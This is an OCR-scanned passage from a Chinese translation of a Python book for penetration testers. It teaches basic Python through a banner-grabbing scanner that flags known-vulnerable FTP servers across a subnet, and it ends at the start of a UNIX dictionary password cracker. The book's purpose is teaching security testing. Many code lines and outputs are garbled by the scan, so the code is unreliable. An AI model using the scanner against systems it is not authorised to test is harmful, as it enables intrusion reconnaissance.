域 管理 员 登 录 了 其 中 一 台 机 器 。 此 时 他 的 分 类 也 基本 完成 ， 现 在 我 的 朋友 知道 下 一 步 攻 击 该 
从 何 处 着 手 了 。 

压力 下 的 快速 反应 和 创造 性 思考 能 力 ， 使 我 的 朋友 成 为 一 名 渗透 测试 员 。 他 用 小 脚本 打 
造 出 了 自己 的 工具 ， 并 以 此 成 功 地 黑 掉 了 这 家 财富 500 强 公 司 。 一 段 短小 的 Python 脚本 使 他 
获得 了 超过 一 千 个 工作 站 的 访问 权 。 而 另 一 个 小 脚本 则 使 他 在 一 个 内 行 的 管理 员 断 开 他 的 访 
问 连 接 前 ， 从 一 千 台 工作 站 中 挑 出 最 重要 的 那 台 。 针 对 你 目 己 的 问题 ， 打 造 你 自己 的 武器 ， 
这 样 你 才能 成 为 一 名 真正 的 渗透 测试 员 。 

让 我 们 开启 我 们 的 学 习 之 旅 ， 先 准备 好 我 们 的 开发 环境 ， 然 后 构建 我 们 自己 的 工具 。 


准备 开发 环境 


Python 的 下 载 网 站 Chttp://www.python.org/download/) 中 提供 了 Windows. Mac OS X 和 
Linux 操作 系统 上 的 Python 安装 程序 。 差 别 在 于 : 如 果 你 运行 的 是 Mac OS X BK Linux, 
Python 解释 器 就 已 经 装 在 你 的 系统 上 了 。 下 载 的 安装 程序 向 程序 员 提 供 了 Python 解释 器 、 标 
准 库 以 及 几 个 内 置 模块 。Python 标准 库 和 内 置 模 块 提 供 的 功能 非常 广泛 ， 包 括 内 置 数据 类 
型 、 异 常 处 理 、numeric 和 数学 模块 、 文 件 处 理 能 力 、 加 密 服 务 、 与 操作 系统 的 交互 操作 、 网 
络 数据 处 理 ， 与 IP 协议 的 交互 以 及 许多 其 他 的 有 用 模块 。 同 时 ， 程 序 员 也 可 以 很 容易 地 安装 
其 他 任何 第 三 方 的 软件 包 (package) 。 在 http://pypi.python.org/pypi/ 中 可 获得 一 个 第 三 方 包 的 
综合 列表 。 


安装 第 三 方 库 


在 第 2 章 中 ， 我 们 将 利用 Python-nmap 包 去 解析 nmap 的 结果 。 下 面 的 例子 描述 了 如 何 下 
载 和 安装 python-nmap 包 《〈 事 实 上 ， 安 装 任何 包 都 这 么 操作 ) 。 把 包 下 载 到 本 地 之 后 解压 ， 
并 将 当前 工作 目录 切换 到 解压 出 来 的 目录 。 在 这 个 目录 中 ， 我 们 用 python setup.py install 命令 
来 安装 python-nmap 包 。 大 多 数 第 三 方 软件 包 的 安装 都 将 遵循 相同 的 步骤 : 下 载 、 解 压缩 ， 
然后 使 用 python setup.py install 命令 。 


第 1 章 ANN 


| programmer:!# wget http://xael.org/norman/python/python-nmap/pythonnmap- 
0.2.4.tar.gz-On map.tar.gz 

--2012-04-24 15:51:51--http://xael.org/norman/python/python-nmap/ 
python-nmap-0.2.4.tar.gz 

Resolving xael.org... 194.36.166.10 

Connecting to xael.org|194.36.166.10|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 29620 (29K) [application/x-gzip] 

Saving to: ‘nmap.tar.gz' 


100% {=====================~=========================== 二 = 
=============>] 29,620 60.8K/s in 0.5s 


2012-04-24 15:51:52 (60.8 KB/s) - ‘nmap.tar.gz' saved [29620/29620] 
programmer:!# tar -xzf nmap.tar.gz 

programmer:!# cd python-nmap-0.2.4/ 

programmer: !/python-nmap-0.2.4# python setup.py install 

running install 

running build 

running build py 

creating build 

creating build/lib.linux-x86 64-2.6 

creating build/lib.linux-x86 64-2.6/nmap 

copying nmap/ init__.py -> build/lib.linux-x86 64-2.6/nmap 

copying nmap/example.py -> build/lib.linux-x86 _ 64-2.6/nmap 

copying nmap/nmap.py -> build/lib.linux-x86 64-2.6/nmap 

running install lib | 

creating /usr/local/lib/python2.6/dist-packages/nmap 

copying build/lib.linux-x86 64-2.6/nmap/ init__.py -> /usr/local/lib/ 
python2.6/dist-packages/nmap 

copying build/lib.linux-x86 64-2.6/nmap/example.py -> /usr/local/lib/ 
python2.6/dist-packages/nmap 

copying build/lib.linux-x86 64-2.6/nmap/nmap.py -> /usr/local/lib/ 
python2.6/dist-packages/nmap 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/ init .py 
to... Te eRe 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/example.py 
to example.pyc 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/nmap.py to 
nmap.pyc 

running install egg info 

Writing /usr/local/lib/python2.6/dist-packages/python nmap-0.2.4.egginfo 


为 使 Python 包 安 装 起 来 更 简单 ，Python 的 setuptools 中 有 个 名 为 easy install 的 模块 。 当 


Python 绝技 : 运用 Python 成 为 顶级 墨客 


我 们 在 命令 行 中 运行 这 个 模块 ， 并 将 要 安装 的 模块 名 作为 参数 传递 给 它 时 ， 它 会 自动 到 
Python 官网 中 搜索 这 个 包 ， 如 果 找 到 就 下 载 ， 并 自动 安装 它 。 
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为 了 快速 建立 一 个 开发 环境 ， 我 们 建议 从 http://www.backtrack-linux. rg/downloads/ F &— 
份 最 新 的 BackTrack Linux 渗透 测试 系统 光盘 镜像 。 该 系统 中 提供 了 大 量 用 于 渗透 测试 及 电子 
取证 、 网 站 、 网 络 分 析 和 无 线 攻 击 的 工具 。 下 面 几 个 例子 中 都 需要 使 用 BackTrack 系统 中 的 
库 或 工具 。 在 本 书 的 案例 中 ， 如 需要 标准 库 和 内 置 模块 以 外 的 第 三 方 软件 包 ， 文 中 会 提供 下 
载 站 点 。 

在 准备 开发 环境 时 ， 一 开始 就 把 所 有 的 这 些 第 三 方 模块 下 载 好 或 许 是 个 不 错 的 选择 。 在 
Backtrack 中 ， 你 可 以 通过 easy_install 命令 安装 所 需 的 额外 的 库 。 下 面 是 在 Linux 系统 下 安装 
本 书 案例 中 所 要 使 用 的 大 多 数 库 的 命令 。 









第 5 章 需 要 用 几 个 无 法 用 easy_install 命令 安装 的 与 蓝牙 有 关 的 库 。 你 可 以 使 用 apt-get 下 
载 和 安装 这 些 库 。 
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Selecting previously deselected package python-bluez. 

Unpacking python-bluez (from . ../python-bluez_ 0.18-1 amd64. deb) 
Setting up bluetooth (4.60- Ou ra 

Setting up python-bluez (0.18-1) ... 

Processing triggers for python-central 


此 外 ， 第 5 章 和 第 7 章 中 的 少 部 分 例子 需要 在 Windows 系统 中 使 用 Python。 请 访问 
http://www.python.org/getit/ 下 载 最 新 的 Windows 的 Python 安装 程序 。 

近年 来 ，Python 源 代码 已 经 分 成 两 个 稳定 的 分 支 : 2.x 和 3.x。Python 的 原作 者 Guido van 
Rossum 为 使 语言 更 加 一 致 ， 对 代码 做 了 清理 。 这 么 做 牺牲 了 对 Python 2x 版 本 的 向 后 兼容 
性 。 例 如 ， 作 者 用 需要 传 入 相关 参数 的 print(0) 函 数 蔡 换 掉 了 Python 2.x 中 的 print 语句 。 以 下 


各 章 的 例子 都 Python 2.x。 本 书 出 版 时 ，BackTrack 5 R2 中 提供 的 Python 的 稳定 版 是 Python 
2.6.56 


programmer# python -V 
Python 2.6.5 


Python 解释 与 Python 交互 


与 其 他 脚本 语言 一 样 ，Python 是 一 种 解释 型 语言 。 解 释 器 在 运行 时 处 理 并 执行 代码 。 为 
了 演示 如 何 使 用 Python 解释 器 ， 我 们 把 print "Hello World" 这 条 语句 写 入 一 个 扩展 名 为 .py 的 
文件 中 。 然 后 调用 Python 解释 器 ， 并 把 这 个 新 创建 的 脚本 作为 参数 传递 给 它 。 


programmer# echo print \"Hello World\"> hello.py 
programmer# python hello.py 
Hello World 


此 外 ，Python 还 具有 交互 的 能 力 。 程 序 员 可 以 调用 Python 解释 器 并 直接 与 之 交互 。 要 启 
动 解释 器 ， 程 序 员 只 要 执行 不 带 参数 的 python 命令 即 可 。 接 下 来 ， 解 释 器 会 向 程序 员 显 


示 >>> 提 示 符 ， 表 明 它 可 以 接受 命令 了 。 在 这 里 ， 程 序 员 再 次 输入 print “Hello World”. 4&F 
回 车 键 后 ，Python 交互 式 解 释 器 会 立即 执行 该 语句 。 


programmer# python 

Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2 

>>> it” 

>>> print "Hello World" 

Hello World 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


为 了 能 让 你 基本 了 解 一 些 语言 背后 的 语义 ， 本 章 会 偶尔 使 用 Python 解释 器 的 交互 功能 。 
如 果 你 在 下 面 的 例子 中 看 到 了 >>> 提 示 符 ， 你 就 应 该 猜 到 我 们 正在 使 用 交互 式 解 释 器 。 

下 面 各 章 中 ， 在 解释 Python 的 例子 时 ， 我 们 会 在 几 个 被 称 为 方法 或 功能 的 功能 代码 块 的 
基础 上 编写 我 们 的 脚本 。 在 所 有 写 好 的 脚本 中 ， 我 们 会 看 到 这 些 方 法 是 如 何 被 组 合 使 用 ， 并 
在 main() 方 法 中 被 调用 的 。 如 果 试 图 运行 一 个 只 含 单独 函数 定义 ， 却 没有 调用 这 些 函 数 的 语 
句 的 脚本 是 毫 无 意义 的 。 在 大 多 数 情况 下 ， 你 可 以 根据 其 中 是 不 是 定义 了 main() 函 数 来 判别 
脚本 是 不 是 已 经 写 完 了 。 当 然 ， 在 开始 编写 第 一 个 程序 之 前 ， 我 们 先 来 说 明 一 些 Python 标准 
库 的 关键 组 件 。 


Python 语 言 


在 接 下 来 的 内 容 中 ， 我 们 将 了 解 变量 、 数 据 类 型 、 字 符 串 、 复 杂 的 数据 结构 、 网 络 、 条 
件 选 择 语 句 、 和 迭代 、 文 件 处 理 、 异 常 处 理 ， 以 及 与 操作 系统 的 交互 操作 等 概念 。 为 了 说 清 这 
些 概念 ， 我 们 会 构建 一 个 简单 的 漏洞 扫描 器 ， 它 的 功能 是 连接 一 个 TCP 套 接 字 ， 从 服务 器 上 
读 取 banner ， 并 将 其 与 已 知 有 漏洞 的 服务 器 版 本 〈 的 banner) 进行 比较 。 作 为 一 个 有 经 验 的 
程序 员 ， 你 可 能 会 发 现 一 些 最 初 的 代码 示例 设计 很 生 汲 。 但 随 着 我 们 在 章节 中 对 脚本 的 不 断 
开发 ， 你 会 欣喜 地 发 现 它 变 得 越发 简洁 明 了。 变量 是 任何 一 门 编程 语言 的 基础 ， 就 让 我 们 从 
它 开 始 。 


变量 


在 Python 中 ， 变 量 是 指 存 储 在 茶 个 内 存 地 址 上 的 数据 。 这 个 内 存 地 址 可 以 存储 不 同 的 
值 ， 如 整 型 数 、 实 数 、 布 尔 值 、 字 符 串 ， 或 是 列表 Aist) 或 词典 这 类 更 复杂 的 数据 。 在 下 面 
的 代码 中 ， 我 们 定义 了 一 个 存储 整 型 数 的 变量 pot 和 一 个 存储 字符 串 的 变量 banner。 为 了 把 
两 个 变量 合并 成 一 个 字符 串 ， 我 们 必须 显 式 地 用 str0 函 数 把 变量 port 转换 成 一 个 字符 串 。 


>>> port = 21 

>>> banner = "FreeFloat FTP Server" 

>>> print "[+] Checking for "+banner+" on port "+str (port) 
[+] Checking for FreeFloat FTP Server on port 21 | 


当 程 序 员 声明 变量 时 ，Python 会 为 变量 保留 内 存 空间 。 程 序 员 可 以 不 显 式 地 声明 变量 的 


1 即 连 上 服务 器 后 ， 服 务 器 响应 的 第 一 句 欢 迎 语句 





译 者 注 。 
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类 型 ，Python 解释 器 可 以 决定 变量 的 类 型 和 为 变量 保留 多 少 内 存 空间 。 请 看 下 面 这 个 例子 ， 
我 们 声明 了 一 个 字符 串 、 一 个 整 型 数 、 一 个 列表 和 一 个 布尔 值 ， 而 解释 器 正确 地 自动 确定 了 
每 个 变量 的 类 型 。 





字符 串 


Python 的 string 模块 提供 了 一 系列 非常 强壮 的 处 理 字符 串 的 方法 。 在 http://docs.python.org/ 
library/string.html 的 Python 文档 中 可 以 看 到 可 用 方法 的 完整 列表 。 我 们 来 看 下 面 这 四 个 方法 
的 用 法 : upper0、lower0、replace0 和 find0。upper0 是 将 字符 串 转 成 大 写 形式 。lower0 是 将 
字符 串 转 成 小 写 形式 。replace(old,new) 是 用 new 子 串 取 代 old 子 串 。find0 会 返回 子 串 在 字符 
串 中 第 一 次 出 现时 的 偏 移 量 。 


List ( 列表 ) 


Python 中 的 list 数据 结构 是 在 Python 中 存储 对 象 数组 的 极 好 方式 。 程 序 员 可 以 创建 任意 
数据 类 型 的 list。 此 外 ， 其 中 还 内 置 了 执行 添加 、 插 入 、 删 除 、 出 站 、 索 引 、 计 数 、 排 序 、 反 
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转 等 操作 的 方法 。 请 看 下 面 这 个 例子 : 一 个 程序 员 可 以 通过 调用 append() 方 法 癌 其 中 添加 元 
素 ， 在 正式 创建 list 之后， 我们 可 以 打印 出 其 中 的 元 素 ， 并 在 再 次 打印 其 中 的 元 素 之 前 对 它们 
进行 排序 。 程 序 员 可 以 找 出 某 个 指定 元 素 〈 本 例 中 是 整 型 数 80) 的 索引 (index) 。 同 时 ， 也 
可 以 删除 指定 的 元 素 〈( 本 例 中 是 整 型 数 443) 。 


>>> portList = [] 

>>> portList.append (21) 

>>> portList.append(80) 

>>> portList.append (443) 

>>> portList.append(25) 

>>> print portList 

[21, 80, 443, 25] 

>>> portList.sort() 

>>> print portList 

(22, 237 807 443) 

>>> pos = portList. index (80) 

>>> print "[+] There are "+str(pos)+" ports to scan before 80." 
[+] There are 2 ports to scan before 80. >>> portList. remove (443) 
>>> print portList 

P2295 125;- 80] 

>>> cnt = len(portList) 

>>> print mit] Scanning "t+str(cnt)+" Total Ports." 

[+] Scanning 3 Total Ports. 


1a] BB 


Python 的 词典 数据 结构 提供 了 一 个 可 以 存储 任意 数量 的 Python 对 象 的 哈 希 表 。 词 典 由 n 
对 键 和 值 的 项 Citem) 组 成 。 让 我 们 继续 用 漏洞 扫描 器 的 例子 来 解释 Python 词 库 。 在 扫描 指 
定 的 TCP 端口 时 ， 包 含有 与 各 端口 及 对 应 的 常用 服务 名 的 词典 就 可 能 很 有 用 。 创 建 了 一 个 相 
AMA), RIER fip 之 类 的 关键 字 ， 就 会 返回 与 之 关联 的 端口 值 一 一 21。 

创建 词典 时 ， 每 个 键 和 它 的 值 都 是 以 冒号 分 隔 的 ， 同 时 用 逗号 分 隔 各 个 项 。 注 意 ，keys() 
方法 返回 的 是 词典 中 所 有 键 的 列表 ， 而 .items(0) 方 法 返回 的 是 词典 中 所 有 项 的 完整 信息 的 列 
表 。 接 下 来 ， 我 们 要 验证 词典 中 是 否 含有 指定 的 键 〈ftp) 。 引 用 此 键 ， 返 回 的 是 它 的 值 
21。 

>>> services = {'ftp':21,'ssh':22,'smtp':25, 'http':80} 


>>> services.keys () 
{Sm ‘seh’... “nite 


>>> services.items() 

HO Eto Tn ame 25) ¢ 0 ssh", 22), 0 tt 80) 

>>> services.has_ key('ftp") 

True 

>>> services['ftp'] 

21 

>>> print "[+] Found vuln with FTP on port "+str(services['ftp’]) 
[+] Found vuln with FTP on port 21 


网 络 


socket 模块 提供 了 一 个 用 Python 进行 网 络 连接 的 库 。 让 我 们 快速 编写 一 个 抓 取 banner 的 
(banner-grabbing) 脚本 。 我 们 的 脚本 会 在 连 上 指定 的 IP 地 址 和 TCP 端口 后 ， 将 banner 打印 
出 来 。 导 入 socket 模块 之 后 ， 我 们 实例 化 一 个 socket 类 的 新 变量 s。 接 下 来 ， 我 们 用 connect() 
方法 建立 与 指定 IP 地 址 和 端口 的 网 络 连接 。 一 旦 连接 成 功 ， 就 可 以 通过 套 接 字 进行 读 / 写 操 
作 。recv(1024) 方 法 将 读 取 套 接 字 中 接 下 来 的 1024B 数据 。 我 们 把 该 方法 的 返回 结果 放 在 一 个 
变量 中 ， 并 把 这 个 来 自 服务 器 的 响应 结果 打印 出 来 。 


>>> import socket 

>>> socket.setdefaulttimeout (2) 

>>> s = socket.socket() 

>>> s.connect (("192.168.95.148",21)) 

>>> ans = s.recv (1024) 

>>> print ans 

220 FreeFloat Ftp Server (Version 1.00). 


条 件 选择 语句 


像 大 多 数 编程 语言 一 样 ，Python 提供 了 条 件 选 择 语句 的 方法 。IF 语句 是 对 逻辑 表达 式 进 
行 求 值 ， 并 根据 求 值 结果 做 出 决定 。 我 们 仍 以 抓 取 banner 的 脚本 为 例 : 我 们 想 要 知道 某 个 指 
定 的 FTP 服务 器 中 是 否 存在 可 以 攻击 的 漏洞 。 这 就 需要 将 服务 器 的 啊 应 结果 与 一 些 已 知 存在 
漏洞 的 FTP 服务 器 版 本 (的 banner) 进行 比较 。 


>>> import socket 

>>> socket.setdefaulttimeout (2) 

>>> s = socket.socket () 

>>> s.connect (("192.168.95.148",21) ) 
>>> ans = s.recv(1024) 
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>>> if ("FreeFloat Ftp Server (Version 1.00)" in ans): 
a print "(+] FreeFloat FTP Server is vulnerable." 
..-@lif ("3Com 3CDaemon FTP Server Version 2.0" in banner): 
i print "[+] 3CDaemon FTP Server is vulnerable." 
. elif ("Ability Server 2.34" in banner): 
ze print "[+] Ability FTP Server is vulnerable." 
“=. elif ("Sami FTP Server 2.0.2" in banner): 
print "{+] Sami FTP Server is vulnerable." 
. else: 
print "[-] FTP Server is not vulnerable." 


[+] FreeFloat FTP Server is vulnerable." 


异常 处 理 





即使 程序 员 编 写 的 程序 语法 完全 正确 ， 在 程序 运行 或 执行 时 仍 可 能 出 错 一 一 最 典型 的 就 
ERF. AA 0 不 能 作为 除数 ，Python 解释 器 会 显示 一 条 消息 通知 程序 员 该 错误 。 这 个 错 
误会 终止 程序 的 执行 。 

>>> print 1337/0 

Traceback (most recent call last): 


File "<stdin>", line 1, in <module> 
ZeroDivisionError: integer division or modulo by zero 


如 果 我 们 只 是 想 在 正在 运行 的 程序 或 脚本 的 上 下 文 环境 中 处 理 错误 ， 该 怎么 办 呢 ? 
Python 语言 提供 的 异常 处 理 功 能 就 是 做 这 件 事 的 。 我 们 把 前 面 的 例子 更 新 一 下 ， 用 try/except 
语句 进行 异常 处 理 。 现 在 ， 该 程序 试图 执行 一 个 除 零 错 。 当 错误 发 生 时 ， 我 们 的 异常 处 理 捕 
获 这 一 错误 并 在 屏幕 上 打印 一 条 消息 。 

人 . 

print "[+] 1337/0 = "+str(1337/0) 
. except: | 
print...“ i-) Error" 

[-] Error 

>>> 

遗憾 的 是 ， 我 们 得 到 的 有 关 导 致 错误 异常 的 确切 信息 非常 少 。 同 用 户 提 供 能 提示 当前 发 
生 了 什么 错误 的 出 错 消 息 可 能 是 非常 有 用 的 。 为 了 做 到 这 一 点 ， 我 们 要 把 异常 存储 到 变量 e 
中 ， 以 便 将 其 打印 出 来 ， 同 时 还 要 显 式 地 将 变量 e 转换 成 一 个 字符 串 。 
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>>> frye: | 
print [E+] 1337/0 = "+str (133770) 
. except Exception, e: 
print “[-] Error = "+str (e) 
ET | 
[-] Error = integer division or modulo by zero 
>>> 


现在 ， 让 我 们 用 异常 处 理 来 更 新 抓 取 banner 的 脚本 。 我 们 把 网 络 连接 代码 写 在 try 语句 
块 中 。 接 下 来 ， 我 们 尝试 连接 到 一 台 没 有 在 TCP 端口 21 上 运行 FTP 服务 的 机 器 。 如 果 我 们 
等 待 的 连接 超时 ， 就 会 看 到 一 条 表明 网 络 连接 操作 超时 的 消息 。 我 们 的 程序 现在 变 成 了 这 个 
样子 : 

>>> import socket 

>>> socket.setdefaulttimeout (2) 

>>> s = socket.socket () 

>>> try: . Sie 
s,.connect (("192.168.95.149", ZLEJ) 
。 except Exception, e: 

print “[-] Error = "+str (e) 


[一 Error = Operation timed out 


关于 本 书 中 的 异常 处 理 ， 需 要 提醒 的 是 : 为 了 在 接 下 来 的 内 容 中 清晰 地 阐明 各 种 各 样 的 
概念 ， 在 本 书 中 尽量 减少 了 异常 处 理 的 使 用 。 你 可 以 随意 更 新 随 书 代码 ， 在 其 中 加 入 更 健壮 
的 异常 处 理 代 码 。 


EEN 


在 Python 中 ， 函 数 提 供 了 高 效 的 可 重用 代码 块 。 通 常 ， 这 使 得 程序 员 能 够 编写 一 个 用 以 
完成 一 个 任务 单一 、“《 与 程序 的 其 他 部 分 ) 高 度 耦 合 的 操作 的 代码 块 。 尽 管 Python 自 带 有 许 
多 内 置 函 数 ， 程 序 员 仍 可 以 创建 用 户 定义 的 函数 。 关 键 字 def (表示 函数 开始 。 程 序 员 可 以 在 
括号 内 填写 任何 变量 。 然 后 这 些 变量 会 被 以 引用 的 方式 传递 给 函数 一 一 也 就 是 说 ， 函 数 内 对 
这 些 变 量 的 任何 更 改 都 会 影 啊 它们 在 主 调 函 数 中 的 值 。 仍 以 之 前 的 FTP 漏洞 扫描 器 为 例 ， 我 
们 创建 一 个 函数 来 完成 连接 到 FTP 服务 器 并 返回 banner 的 操作 。 

import socket 

def retBanner (ip, port): 


try: 
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banner 返回 后 ， 我 们 的 脚本 需要 把 它们 和 一 些 已 知 有 漏洞 的 程序 (的 banner) 进行 比 
较 。 这 也 反映 出 一 个 任务 单一 的 《与 程序 的 其 他 部 分 ) 高 度 看 合 的 功能 。checkVulns0) 函 数 接 


收 一 个 参数 一 banner 变量 ， 并 以 此 来 判断 服务 器 中 是 否 存在 漏洞 。 


Hi) 1l ji Mahe 
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在 最 后 一 节 你 可 能 已 经 发 现 ， 我 们 重复 编写 了 三 次 几乎 完全 相同 的 代码 ， 检 查 三 个 不 同 
的 IP 地 址 。 与 写 三 次 相同 的 程序 相 比 ， 用 for 循环 遍历 多 个 元 素 可 能 更 容易 。 举 个 例子 ， 如 
果 想 遍历 IP 地 址 从 192.168.95.1 到 192.168.95.254 的 整个 /24 子 网 ， 使 用 for 循环 (范围 从 1 
到 255) 可 以 打印 出 整个 子 网 。 
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同样 ， 如 果 我 们 想 通过 遍历 所 有 已 知 端口 列表 的 方式 检查 漏洞 ， AMEE list 中 的 所 
有 元 素 即 可 ， 无 须 遍历 某 个 范围 内 的 所 有 数字 。 


通过 嵌 套 两 个 for 循环 ， 我 们 可 以 打印 出 每 个 IP 地 址 上 的 每 个 端口 。 


ATER P 地 址 和 端口 的 能 力 ， 我 们 来 更 新 漏洞 检查 脚本 。 现 在 ， 脚 本 将 测试 
192.168.95.0/24 子 网 上 的 所 有 254 个 IP 地 址 ， 测 试 的 端口 包括 telnet. SSH. SMTP. HTTP. 
IMAP 及 HTTPS 协议 的 端口 。 
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文件 输入 /输出 


尽管 脚本 里 有 一 个 IF 语句 ， 它 能 检查 一 些 有 漏洞 的 服务 器 的 banner， 但 偶尔 能 往 这 个 有 
漏洞 的 服务 器 的 banner 列表 中 添加 新 元 素 似乎 也 很 不 错 。 在 这 个 例子 中 ， 假 设 有 一 个 名 为 
vuln_banners.txt 文本 文件 ， 这 个 文件 的 每 一 行 都 列 出 了 一 个 已 知 有 漏洞 的 特定 服务 版 本 的 
banner) 。 我 们 可 以 读 取 这 个 文本 文件 ， 用 它 来 判断 我 们 的 banner 是 否 表示 有 漏洞 的 服务 
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器 ， 而 不 用 写 上 一 大 堆 证 语句 去 判断 。 






bd MOY dl 


a 


我 们 在 checkVulns 函数 中 换 上 了 新 的 代码 。 这 里 以 只 读 模 式 Cr) 打开 文本 文件 ， 
用 ,readlines(0) 方 法 遍历 文件 中 的 每 一 行 ， 并 将 其 与 我 们 的 banner 做 比较 。 注 意 : 必须 
用 .strip(\r) 方 法 将 每 一 行 的 回 车 键 去 掉 。 一 旦 检测 到 匹配 ， 我 们 就 打印 一 个 有 漏洞 的 服务 器 的 


banner。 





sys 模 块 


内 置 的 sys 模块 使 我 们 能 访问 到 由 Python 解释 器 使 用 或 维护 的 对 象 ， 其 中 包括 标志 、 版 
本 、 整 型 数 的 最 大 尺寸 、 可 用 的 模块 、hook 路 径 、 标 准 错误 /输入 /输出 的 位 置 ， 以 及 调用 解 
释 器 的 命令 行 参数 。http://docs.python.org/library/sys 是 Python 的 在 线 module 文档 ， 你 可 以 从 
中 找到 更 详细 的 有 用 信息 。 与 sys 模块 交互 对 创建 Python 脚本 非常 有 帮助 。 比 如 ， 我 们 或 许 
会 想 要 在 运行 时 解析 命令 行 参数 。 比 如 ， 漏 洞 扫描 器 : 如 果 我 们 想 把 一 个 文本 文件 的 文件 名 
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作为 命令 行 参 数 传 递 进 来 该 怎么 办 ? sys.argv 列表 中 含有 所 有 的 命令 行 参数 。 第 一 个 
sys.argv[0] 元 素 中 的 是 Python 脚本 的 名 称 ， 列 表 中 的 其 余 元 素 中 则 记录 了 之 后 所 有 的 命令 行 
参数 。 因 此 ， 如 果 我 们 只 是 传递 一 个 额外 的 参数 ，sys.argv 中 应 该 包含 两 个 元 素 。 


import sys 
if len(sys.argv) ==2: 
filename =sys.argv[1] 


print " [+] Reading Vulnerabilities From: "+filename 


运行 这 段 代 码 ， 我 们 看 到 代码 成 功 地 解析 了 命令 行 参数 ， 并 将 其 打印 到 了 屏幕 上 。 值 得 
化 些 时 间 学 习 整 个 sys 模块 的 用 法 ， 因 为 它 为 程序 员 提 供 了 许多 功能 。 


programmer$ python vuln-scanner.py vuln-banners.txt 
[+] Reading Vulnerabilities From: vuln-banners.txt 


OS 模块 


内 置 的 OS 模块 提供 了 丰富 的 适用 于 Mac, NT 或 Posix 的 操作 系统 的 函数 。 这 个 模块 允 
许 程序 独立 地 与 操作 系统 环境 、 文 件 系 统 、 用 户 数据 库 以 及 权限 进行 交互 。 举 个 例子 ， 在 上 
一 节 中 ， 用 户 把 一 个 文本 文件 的 文件 名 作为 命令 行 参数 传递 了 进来 ， 先 检查 一 下 该 文件 是 否 
存在 、 当 前 用 户 是 否 有 权限 读 取 该 文件 ， 或 许 是 很 有 价值 的 。 如 果 其 中 任 一 条 件 不 满足 ， 就 
向 用 户 显 示 一 条 相应 的 错误 信息 是 很 有 用 的 。 


import sys 
import os 
if len(sys.argv) ==2: 
filename = sys.argv[1] 
if not os.path.isfile (filename): 
print '[-] ' +filename +' does not exist.' 
exit (0) 
if not os.access(filename, os.R_OK): 
print '[-] ' +filename +' access denied.' 
exit (0) 
print '[+] Reading Vulnerabilities From: ' + filename 


为 了 验证 代码 ， 我 们 先 尝试 读 取 一 个 不 存在 的 文件 ， 脚 本 提示 错误 信息 后 ， 我 们 创建 一 
个 特定 的 文件 名 并 成 功 读 取 了 其 中 的 内 容 。 最 后 ， 我 们 限制 权限 ， 脚 本 则 正确 地 提示 拒绝 访 
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la] Caccess-denied) 的 信息 。 


现在 ， 可 以 重新 整合 一 下 Python 漏洞 扫描 脚本 的 各 个 部 分 。 如 果 你 觉得 它 还 不 够 棒 ， 也 
别 灰心 ， 因 为 它 还 没有 使 用 线程 或 对 命令 行 参 数 进行 更 好 地 解析 。 在 下 面 的 内 容 中 ， 我 们 会 
进一步 完善 这 个 脚本 。 
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if not os.access(filename, os.R_OK): 
print '[-] ' + filename +\ 
' access denied.' 
exit (0) 
else: 
print '[-] Usage: ' +str(sys.argv[0]) +\ 
' <vuln filename>' 
exit (0) 
portList = [21,22,25,80,110, 443] 
for x in range(147, 150): 
ip 192 LG te) 
for port in portList: 
banner =retBanner(ip, port) 
if banner: 
print LED * tip + *;.° *+banner 
l checkVulns (banner, filename) 
if. name ~set main 13 
main () 


第 一 个 Python 程序 


在 学 会 了 如 何 创建 Python 脚本 后 ， 我 们 先 来 写 两 个 程序 。 随 着 不 断 地 深入 ， 我 们 还 会 讲 
述 一 些 强 调 脚 本 有 多 重要 的 有 趣 轶 事 。 


第 一 个 程序 的 背景 材料 : HAS 


在 《布谷 蛋 在 电脑 间谍 的 迷宫 中 追踪 间谍 (Stoll, 1989)—+54, Lawrence Berkley 国家 
实验 室 的 系统 管理 员 Clifford Stoll 记录 了 他 个 人 追捕 阁 进 美国 各 国家 研究 实验 室 、 陆 军 基 
地 、 国 防 承包 商 和 学 术 机 构 中 的 黑客 〈 和 克格勃 线 人 ) 的 经 历 。 他 还 在 1988 年 5 月 出 版 的 
《美国 计算 机 协会 通信 》 中 撰文 详细 描述 了 攻击 和 追捕 的 技术 细节 。 

黑客 的 攻击 手段 与 行动 令 Stoll 非常 着 迷 ， 他 将 打印 机 连接 到 一 台 被 黑 的 服务 器 上 ， 记 录 
下 攻击 者 的 每 个 按键 操作 。 在 一 个 记录 中 ，Stoll 发 现 了 一 些 (至 少 在 1988 年 时 ) 有 趣 的 事 
fa: 几乎 在 攻 入 服务 器 的 同时 ， 攻 击 者 就 立即 下 载 了 加 密 的 口令 文件 。 这 些 文件 对 攻击 者 会 
有 什么 用 ? 要 知道 ， 服 务 器 系统 是 使 用 UNIX crypt 算法 对 用 户口 令 进行 加 密 的 。 然 而 ， 在 窃 
取 了 加 蜜 口令 文件 后 的 一 周 ，Stoll 就 发 现 了 攻击 者 用 偷 来 的 账号 登录 的 情况 。 后 来 在 接触 了 
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一 些 被 黑 主机 的 用 户 后 ，Stoll 才 明 白 ， 原 来 这 些 被 黑 主 机 的 用 户 都 是 使 用 字典 中 的 常用 词 作 
为 口令 的 。 

知道 这 一 点 后 ，Stoll 意识 到 黑客 曾 使 用 字典 攻击 法 去 破解 加 密 的 口令 。 黑 客 穷 举 了 字典 
中 的 所 有 单词 ， 并 用 Unix crypt0) 函 数 对 它们 加 密 ， 然 后 将 结果 与 偷 来 的 加 密 密 码 进行 对 比 。 
如 果 能 对 比 成 功 ， 就 破 开 了 一 个 口令 。 

比如 下 面 这 个 口令 文件 ， 被 黑 主 机 的 用 户 使 用 的 口令 的 明文 是 单词 egg 和 salt 就 是 开头 
的 两 个 字 节 一 一 HX。UNIX Crypt 函数 计算 的 加 密 口 令 为 : crypt('egg''HX")=HX9LLTdc/fjiiDE。 


~ VO a - r ot j= = em 一 -一 < -一 一 a i 
7y" lp ae se ey 、 天 有 站: ER te, 放 ie a onl © me «2 一 v 






我 们 就 以 这 个 加 密 口 令 文 件 为 契机 ， 编 写 第 一 个 Python 脚本 : UNIX 口令 破解 机 。 


第 一 个 程序 : UNIX 口 令 破 解 机 


